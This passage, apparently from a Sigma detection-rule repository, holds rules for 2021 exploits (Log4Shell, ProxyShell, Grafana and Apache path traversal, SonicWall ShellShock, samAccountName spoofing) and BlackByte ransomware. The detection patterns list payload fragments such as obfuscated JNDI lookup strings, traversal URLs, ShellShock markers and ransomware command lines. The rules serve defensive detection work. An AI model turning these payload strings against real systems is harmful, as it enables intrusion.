    "content": "title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event\nid: 3be82d5d-09fe-4d6a-a275-0d40d234d324\nstatus: test\ndescription: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file\nreferences:\n    - https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver\n    - https://www.zerodayinitiative.com/advisories/ZDI-21-1308/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-22\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msiexec.exe'\n        TargetFilename|startswith: 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application'\n        TargetFilename|endswith: '\\elevation_service.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\n    - Possibly some Microsoft Edge upgrades\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-41379/proc_creation_win_exploit_cve_2021_41379.yml",
    "content": "title: Potential CVE-2021-41379 Exploitation Attempt\nid: af8bbce4-f751-46b4-8d91-82a33a736f61\nstatus: test\ndescription: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a \"cmd.exe\" process as a child of Microsoft Edge elevation service \"elevation_service\" with \"LOCAL_SYSTEM\" rights\nreferences:\n    - https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver\n    - https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/\n    - https://www.zerodayinitiative.com/advisories/ZDI-21-1308/\n    - https://www.logpoint.com/en/blog/detecting-privilege-escalation-zero-day-cve-2021-41379/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-22\nmodified: 2024-12-01\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - cve.2021-41379\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_parent:\n        ParentImage|endswith: '\\elevation_service.exe'\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384' # System\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-41379/win_vul_cve_2021_41379.yml",
    "content": "title: LPE InstallerFileTakeOver PoC CVE-2021-41379\nid: 7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8\nstatus: test\ndescription: Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379\nreferences:\n    - https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-22\nmodified: 2022-07-12\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: application\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        EventID: 1033\n        Provider_Name: 'MsiInstaller'\n        Data|contains: 'test pkg'\n    condition: selection\nfalsepositives:\n    - Other MSI packages for which your admins have used that name\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-41773/web_cve_2021_41773_apache_path_traversal.yml",
    "content": "title: CVE-2021-41773 Exploitation Attempt\nid: 3007fec6-e761-4319-91af-e32e20ac43f5\nstatus: test\ndescription: |\n  Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49.\n  An attacker could use a path traversal attack to map URLs to files outside the expected document root.\n  If files outside of the document root are not protected by \"require all denied\" these requests can succeed.\n  Additionally this flaw could leak the source of interpreted files like CGI scripts.\n  This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\nreferences:\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-41773\n    - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782\n    - https://twitter.com/ptswarm/status/1445376079548624899\n    - https://twitter.com/h4x0r_dz/status/1445401960371429381\n    - https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/cves/2021/CVE-2021-41773.yaml\n    - https://twitter.com/bl4sty/status/1445462677824761878\nauthor: daffainfo, Florian Roth\ndate: 2021-10-05\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-41773\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains:\n            - '/cgi-bin/.%2e/'\n            - '/icons/.%2e/'\n            - '/cgi-bin/.%%32%65/'\n            - '/icons/.%%32%65/'\n            - '/cgi-bin/.%%%25%33'\n            - '/icons/.%%%25%33'\n        sc-status:\n            - 200\n            - 301\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-42237/web_cve_2021_42237_sitecore_report_ashx.yml",
    "content": "title: Sitecore Pre-Auth RCE CVE-2021-42237\nid: 20c6ed1c-f7f0-4ea3-aa65-4f198e6acb0f\nstatus: test\ndescription: Detects exploitation attempts of Sitecore Experience Platform Pre-Auth RCE CVE-2021-42237 found in Report.ashx\nreferences:\n    - https://blog.assetnote.io/2021/11/02/sitecore-rce/\n    - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-17\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-42237\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-query|contains: '/sitecore/shell/ClientBin/Reporting/Report.ashx'\n        sc-status: 200\n    condition: selection\nfalsepositives:\n    - Vulnerability Scanning\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-42278/win_system_exploit_cve_2021_42278.yml",
    "content": "title: Potential CVE-2021-42278 Exploitation Attempt\nid: 44bbff3e-4ca3-452d-a49a-6efa4cafa06f\nrelated:\n    - id: e80a0fee-1a62-4419-b31e-0d0db6e6013a\n      type: similar\nstatus: test\ndescription: |\n    The attacker creates a computer object using those permissions with a password known to her.\n    After that she clears the attribute ServicePrincipalName on the computer object.\n    Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\nreferences:\n    - https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/\nauthor: frack113\ndate: 2021-12-15\nmodified: 2023-04-14\ntags:\n    - attack.credential-access\n    - attack.t1558.003\n    - cve.2021-42278\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Microsoft-Windows-Kerberos-Key-Distribution-Center'  # Active Directory\n        EventID:\n            - 35 # PAC without attributes\n            - 36 # Ticket without a PAC\n            - 37 # Ticket without Requestor\n            - 38 # Requestor Mismatch\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-42287/win_security_samaccountname_spoofing_cve_2021_42287.yml",
    "content": "title: Suspicious Computer Account Name Change CVE-2021-42287\nid: 45eb2ae2-9aa2-4c3a-99a5-6e5077655466\nstatus: test\ndescription: Detects the renaming of an existing computer account to an account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287\nreferences:\n    - https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-22\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1036\n    - attack.t1098\n    - cve.2021-42287\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4781 # rename user\n        OldTargetUserName|contains: '$'\n    filter:\n        NewTargetUserName|contains: '$'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-42287/win_system_exploit_cve_2021_42287.yml",
    "content": "title: Potential CVE-2021-42287 Exploitation Attempt\nid: e80a0fee-1a62-4419-b31e-0d0db6e6013a\nrelated:\n    - id: 44bbff3e-4ca3-452d-a49a-6efa4cafa06f\n      type: similar\nstatus: test\ndescription: |\n    The attacker creates a computer object using those permissions with a password known to her.\n    After that she clears the attribute ServicePrincipalName on the computer object.\n    Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\nreferences:\n    - https://cloudbrothers.info/en/exploit-kerberos-samaccountname-spoofing/\nauthor: frack113\ndate: 2021-12-15\nmodified: 2023-04-14\ntags:\n    - attack.credential-access\n    - attack.t1558.003\n    - detection.emerging-threats\n    - cve.2021-42287\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: Microsoft-Windows-Directory-Services-SAM  # Active Directory\n        EventID:\n            - 16990 # Object class and UserAccountControl validation failure\n            - 16991 # SAM Account Name validation failure\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-42321/win_exchange_cve_2021_42321.yml",
    "content": "title: Possible Exploitation of Exchange RCE CVE-2021-42321\nid: c92f1896-d1d2-43c3-92d5-7a5b35c217bb\nstatus: test\ndescription: Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42321\nauthor: 'Florian Roth (Nextron Systems), @testanull'\ndate: 2021-11-18\nmodified: 2022-07-12\ntags:\n    - attack.lateral-movement\n    - attack.t1210\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: msexchange-management\n    # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly\ndetection:\n    selection:\n        EventID:\n            - 6\n            - 8\n        Data|contains:\n            - 'Cmdlet failed. Cmdlet Get-App, '\n            - 'Task Get-App throwing unhandled exception: System.InvalidCastException:'\n    condition: selection\nfalsepositives:\n    - Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-43798/web_cve_2021_43798_grafana.yml",
    "content": "title: Grafana Path Traversal Exploitation CVE-2021-43798\nid: 7b72b328-5708-414f-9a2a-6a6867c26e16\nstatus: test\ndescription: Detects a successful Grafana path traversal exploitation\nreferences:\n    - https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/\n    - https://github.com/search?q=CVE-2021-43798\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-08\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-43798\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_traversal:\n        cs-uri-query|contains: '/../../../../../../../'\n        sc-status: 200\n    selection_plugins:\n        cs-uri-query|contains:\n            - '/public/plugins/live'\n            - '/public/plugins/icon'\n            - '/public/plugins/loki'\n            - '/public/plugins/text'\n            - '/public/plugins/logs'\n            - '/public/plugins/news'\n            - '/public/plugins/stat'\n            - '/public/plugins/mssql'\n            - '/public/plugins/mixed'\n            - '/public/plugins/mysql'\n            - '/public/plugins/tempo'\n            - '/public/plugins/graph'\n            - '/public/plugins/gauge'\n            - '/public/plugins/table'\n            - '/public/plugins/debug'\n            - '/public/plugins/zipkin'\n            - '/public/plugins/jaeger'\n            - '/public/plugins/geomap'\n            - '/public/plugins/canvas'\n            - '/public/plugins/grafana'\n            - '/public/plugins/welcome'\n            - '/public/plugins/xychart'\n            - '/public/plugins/heatmap'\n            - '/public/plugins/postgres'\n            - '/public/plugins/testdata'\n            - '/public/plugins/opentsdb'\n            - '/public/plugins/influxdb'\n            - '/public/plugins/barchart'\n            - '/public/plugins/annolist'\n            - '/public/plugins/bargauge'\n            - '/public/plugins/graphite'\n            - '/public/plugins/dashlist'\n            - '/public/plugins/piechart'\n            - '/public/plugins/dashboard'\n            - '/public/plugins/nodeGraph'\n            - '/public/plugins/alertlist'\n            - '/public/plugins/histogram'\n            - '/public/plugins/table-old'\n            - '/public/plugins/pluginlist'\n            - '/public/plugins/timeseries'\n            - '/public/plugins/cloudwatch'\n            - '/public/plugins/prometheus'\n            - '/public/plugins/stackdriver'\n            - '/public/plugins/alertGroups'\n            - '/public/plugins/alertmanager'\n            - '/public/plugins/elasticsearch'\n            - '/public/plugins/gettingstarted'\n            - '/public/plugins/state-timeline'\n            - '/public/plugins/status-history'\n            - '/public/plugins/grafana-clock-panel'\n            - '/public/plugins/grafana-simple-json-datasource'\n            - '/public/plugins/grafana-azure-monitor-datasource'\n    condition: all of selection*\nfalsepositives:\n    - Vulnerability scanners that scan a host that returns 200 status codes even in cases of a file not found or other error\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-44077/file_event_win_cve_2021_44077_poc_default_files.yml",
    "content": "title: CVE-2021-44077 POC Default Dropped File\nid: 7b501acf-fa98-4272-aa39-194f82edc8a3\nstatus: test\ndescription: Detects the creation of \"msiexec.exe\" in the \"bin\" directory of ManageEngine SupportCenter Plus (related to CVE-2021-44077), for which a public POC is available (see references section)\nreferences:\n    - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/\n    - https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-06\ntags:\n    - attack.execution\n    - cve.2021-44077\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\ManageEngine\\SupportCenterPlus\\bin\\msiexec.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-44228/proc_creation_win_exploit_cve_2021_44228_vmware_horizon_log4j.yml",
    "content": "title: Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon\nid: 3eb91f0a-0060-424a-a676-59f5fdd75610\nstatus: test\ndescription: |\n    Detects potential initial exploitation attempts against VMware Horizon deployments running vulnerable versions of Log4j.\nreferences:\n    - https://portswigger.net/daily-swig/vmware-horizon-under-attack-as-china-based-ransomware-group-targets-log4j-vulnerability\n    - https://twitter.com/TheDFIRReport/status/1482078434327244805\n    - https://www.pwndefend.com/2022/01/07/log4shell-exploitation-and-hunting-on-vmware-horizon-cve-2021-44228/\nauthor: '@kostastsale'\ndate: 2022-01-14\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-44228\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\ws_TomcatService.exe'\n    filter_main_shells:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-44228/web_cve_2021_44228_log4j.yml",
    "content": "title: Log4j RCE CVE-2021-44228 Generic\nid: 5ea8faa8-db8b-45be-89b0-151b84c82702\nstatus: test\ndescription: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)\nreferences:\n    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/\n    - https://news.ycombinator.com/item?id=29504755\n    - https://github.com/tangxiaofeng7/apache-log4j-poc\n    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b\n    - https://github.com/YfryTchsGD/Log4jAttackSurface\n    - https://twitter.com/shutingrz/status/1469255861394866177?s=21\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-10\nmodified: 2022-02-06\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    keywords:\n        - '${jndi:ldap:/'\n        - '${jndi:rmi:/'\n        - '${jndi:ldaps:/'\n        - '${jndi:dns:/'\n        - '/$%7bjndi:'\n        - '%24%7bjndi:'\n        - '$%7Bjndi:'\n        - '%2524%257Bjndi'\n        - '%2F%252524%25257Bjndi%3A'\n        - '${jndi:${lower:'\n        - '${::-j}${'\n        - '${jndi:nis'\n        - '${jndi:nds'\n        - '${jndi:corba'\n        - '${jndi:iiop'\n        - 'Reference Class Name: foo'\n        - '${${env:BARFOO:-j}'\n        - '${::-l}${::-d}${::-a}${::-p}'\n        - '${base64:JHtqbmRp'\n        - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'\n        - '${${lower:j}ndi:'\n        - '${${upper:j}ndi:'\n        - '${${::-j}${::-n}${::-d}${::-i}:'\n    filter:\n        - 'w.nessus.org/nessus'\n        - '/nessus}'\n    condition: keywords and not filter\nfalsepositives:\n    - Vulnerability scanning\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/CVE-2021-44228/web_cve_2021_44228_log4j_fields.yml",
    "content": "title: Log4j RCE CVE-2021-44228 in Fields\nid: 9be472ed-893c-4ec0-94da-312d2765f654\nstatus: test\ndescription: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)\nreferences:\n    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/\n    - https://news.ycombinator.com/item?id=29504755\n    - https://github.com/tangxiaofeng7/apache-log4j-poc\n    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b\n    - https://github.com/YfryTchsGD/Log4jAttackSurface\n    - https://twitter.com/shutingrz/status/1469255861394866177?s=21\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-10\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2021-44228\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection1:\n        cs-user-agent|contains:\n            - '${jndi:ldap:/'\n            - '${jndi:rmi:/'\n            - '${jndi:ldaps:/'\n            - '${jndi:dns:/'\n            - '/$%7bjndi:'\n            - '%24%7bjndi:'\n            - '$%7Bjndi:'\n            - '%2524%257Bjndi'\n            - '%2F%252524%25257Bjndi%3A'\n            - '${jndi:${lower:'\n            - '${::-j}${'\n            - '${jndi:nis'\n            - '${jndi:nds'\n            - '${jndi:corba'\n            - '${jndi:iiop'\n            - 'Reference Class Name: foo'\n            - '${${env:BARFOO:-j}'\n            - '${::-l}${::-d}${::-a}${::-p}'\n            - '${base64:JHtqbmRp'\n            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'\n            - '${${lower:j}ndi:'\n            - '${${upper:j}ndi:'\n            - '${${::-j}${::-n}${::-d}${::-i}:'\n    # selection2:\n        # user-agent|contains:\n            # - '${jndi:ldap:/'\n            # - '${jndi:rmi:/'\n            # - '${jndi:ldaps:/'\n            # - '${jndi:dns:/'\n            # - '/$%7bjndi:'\n            # - '%24%7bjndi:'\n            # - '$%7Bjndi:'\n            # - '%2524%257Bjndi'\n            # - '%2F%252524%25257Bjndi%3A'\n            # - '${jndi:${lower:'\n            # - '${::-j}${'\n            # - '${jndi:nis'\n            # - '${jndi:nds'\n            # - '${jndi:corba'\n            # - '${jndi:iiop'\n            # - 'Reference Class Name: foo'\n            # - '${${env:BARFOO:-j}'\n            # - '${::-l}${::-d}${::-a}${::-p}'\n            # - '${base64:JHtqbmRp'\n            # - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'\n            # - '${${lower:j}ndi:'\n            # - '${${upper:j}ndi:'\n            # - '${${::-j}${::-n}${::-d}${::-i}:'\n    selection3:\n        cs-uri-query|contains:\n            - '${jndi:ldap:/'\n            - '${jndi:rmi:/'\n            - '${jndi:ldaps:/'\n            - '${jndi:dns:/'\n            - '/$%7bjndi:'\n            - '%24%7bjndi:'\n            - '$%7Bjndi:'\n            - '%2524%257Bjndi'\n            - '%2F%252524%25257Bjndi%3A'\n            - '${jndi:${lower:'\n            - '${::-j}${'\n            - '${jndi:nis'\n            - '${jndi:nds'\n            - '${jndi:corba'\n            - '${jndi:iiop'\n            - 'Reference Class Name: foo'\n            - '${${env:BARFOO:-j}'\n            - '${::-l}${::-d}${::-a}${::-p}'\n            - '${base64:JHtqbmRp'\n            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'\n            - '${${lower:j}ndi:'\n            - '${${upper:j}ndi:'\n            - '${${::-j}${::-n}${::-d}${::-i}:'\n    selection4:\n        cs-referer|contains:\n            - '${jndi:ldap:/'\n            - '${jndi:rmi:/'\n            - '${jndi:ldaps:/'\n            - '${jndi:dns:/'\n            - '/$%7bjndi:'\n            - '%24%7bjndi:'\n            - '$%7Bjndi:'\n            - '%2524%257Bjndi'\n            - '%2F%252524%25257Bjndi%3A'\n            - '${jndi:${lower:'\n            - '${::-j}${'\n            - '${jndi:nis'\n            - '${jndi:nds'\n            - '${jndi:corba'\n            - '${jndi:iiop'\n            - 'Reference Class Name: foo'\n            - '${${env:BARFOO:-j}'\n            - '${::-l}${::-d}${::-a}${::-p}'\n            - '${base64:JHtqbmRp'\n            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'\n            - '${${lower:j}ndi:'\n            - '${${upper:j}ndi:'\n            - '${${::-j}${::-n}${::-d}${::-i}:'\n    condition: 1 of selection*\nfalsepositives:\n    - Vulnerability scanning\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/ProxyShell-Exploit/web_exchange_proxyshell.yml",
    "content": "title: Exchange ProxyShell Pattern\nid: 23eee45e-933b-49f9-ae1b-df706d2d52ef\nstatus: test\ndescription: Detects URL patterns that could be found in ProxyShell exploitation attempts against Exchange servers (failed and successful)\nreferences:\n    - https://youtu.be/5mqid-7zp8k?t=2231\n    - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html\n    - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1\nauthor: Florian Roth (Nextron Systems), Rich Warren\ndate: 2021-08-07\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_1:\n        sc-status: 401\n    selection_1_auto:\n        cs-uri-query|contains: '/autodiscover.json'\n    selection_1_uri:\n        cs-uri-query|contains:\n            - '/powershell'\n            - '/mapi/nspi'\n            - '/EWS'\n            - 'X-Rps-CAT'\n    selection_poc:\n        sc-status: 401\n        cs-uri-query|contains:\n            # since we don't know how it will appear in the log files, we'll just use all versions\n            - 'autodiscover.json?@'\n            - 'autodiscover.json%3f@'\n            - '%3f@foo.com'\n            - 'Email=autodiscover/autodiscover.json'\n            - 'json?@foo.com'\n    condition: all of selection_1* or selection_poc\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/ProxyShell-Exploit/web_exchange_proxyshell_successful.yml",
    "content": "title: Successful Exchange ProxyShell Attack\nid: 992be1eb-e5da-437e-9a54-6d13b57bb4d8\nstatus: test\ndescription: Detects URL patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers\nreferences:\n    - https://youtu.be/5mqid-7zp8k?t=2231\n    - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html\n    - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1\nauthor: Florian Roth (Nextron Systems), Rich Warren\ndate: 2021-08-09\nmodified: 2023-01-02\ntags:\n    - attack.initial-access\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_auto:\n        cs-uri-query|contains: '/autodiscover.json'\n    selection_uri:\n        cs-uri-query|contains:\n            - '/powershell'\n            - '/mapi/nspi'\n            - '/EWS'\n            - 'X-Rps-CAT'\n    selection_success:\n        sc-status:\n            - 200\n            - 301\n    condition: selection_auto and selection_uri and selection_success\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/proc_creation_win_exploit_other_razorinstaller_lpe.yml",
    "content": "title: Suspicious RazerInstaller Explorer Subprocess\nid: a4eaf250-7dc1-4842-862a-5e71cd59a167\nstatus: test\ndescription: Detects an explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM\nreferences:\n    - https://twitter.com/j0nh4t/status/1429049506021138437\n    - https://streamable.com/q2dsji\nauthor: Florian Roth (Nextron Systems), Maxime Thiebaut\ndate: 2021-08-23\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1553\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\RazerInstaller.exe'\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384' # System\n    filter_main_razer:\n        Image|startswith: 'C:\\Windows\\Installer\\Razer\\Installer\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - User selecting a different installation folder (check for other sub processes of this explorer.exe process)\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/SystemNightmare-Exploit/proc_creation_win_exploit_other_systemnightmare.yml",
    "content": "title: Potential SystemNightmare Exploitation Attempt\nid: c01f7bd6-0c1d-47aa-9c61-187b91273a16\nstatus: test\ndescription: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM\nreferences:\n    - https://github.com/GossiTheDog/SystemNightmare\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-11\nmodified: 2023-02-04\ntags:\n    - attack.privilege-escalation\n    - attack.t1068\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'printnightmare.gentilkiwi.com'\n            - ' /user:gentilguest '\n            - 'Kiwi Legit Printer'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/VisualDoor-Exploit/README.md",
    "content": "# VisualDoor: SonicWall SSL-VPN Exploit\n\n## Summary\n\nSonicWall \"Virtual Office\" SSL-VPN Products ship an old version of Bash that's vulnerable to ShellShock, and are therefore vulnerable to an unauthenticated remote code execution (as a “nobody” user) via the `/cgi-bin/jarrewrite.sh` URL.\n\n## Rules\n\n- [SonicWall SSL/VPN Jarrewrite Exploitation](./web_sonicwall_jarrewrite_exploit.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2021/Exploits/VisualDoor-Exploit/web_sonicwall_jarrewrite_exploit.yml",
    "content": "title: SonicWall SSL/VPN Jarrewrite Exploitation\nid: 6f55f047-112b-4101-ad32-43913f52db46\nstatus: test\ndescription: Detects exploitation attempts of the SonicWall Jarrewrite Exploit\nreferences:\n    - https://web.archive.org/web/20210126045316/https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/\n    - https://github.com/darrenmartyn/VisualDoor\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-01-25\nmodified: 2023-04-27\ntags:\n    - attack.t1190\n    - attack.initial-access\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-uri-query|contains: '/cgi-bin/jarrewrite.sh'\n        cs-user-agent|contains:\n            - ':;'\n            - '() {'\n            - '/bin/bash -c'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/BlackByte/proc_creation_win_malware_blackbyte_ransomware.yml",
    "content": "title: Potential BlackByte Ransomware Activity\nid: 999e8307-a775-4d5f-addc-4855632335be\nstatus: test\ndescription: Detects command line patterns used by BlackByte ransomware in different operations\nreferences:\n    - https://redcanary.com/blog/blackbyte-ransomware/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-25\nmodified: 2023-02-08\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1485\n    - attack.t1498\n    - attack.t1059.001\n    - attack.t1140\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        Image|startswith: 'C:\\Users\\Public\\'\n        CommandLine|contains: ' -single '\n    selection_2:\n        CommandLine|contains:\n            - 'del C:\\Windows\\System32\\Taskmgr.exe'\n            - ';Set-Service -StartupType Disabled $'\n            - 'powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('\n            - ' do start wordpad.exe /p '\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2021/Malware/BlackByte/registry_set_win_malware_blackbyte_privesc_registry.yml",
